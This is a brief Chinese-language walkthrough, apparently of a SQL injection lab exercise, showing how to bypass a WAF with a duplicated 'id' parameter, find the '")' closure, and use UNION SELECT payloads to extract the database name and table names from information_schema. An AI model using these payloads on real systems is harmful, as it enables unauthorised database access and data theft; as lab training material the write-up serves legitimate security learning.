0x01找闭合 这里是WAF的jsp调到php的同样
第二个参数构造 偷看源码 闭合是")
我们尝试一下构造爆破数据库名
login.php?id=1&id=-1") union select 1,database(),3%23
爆破表名
?id=1&id=-1") union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23
0X03组合拳继续打
切记 学习之路 少就是多 慢就是快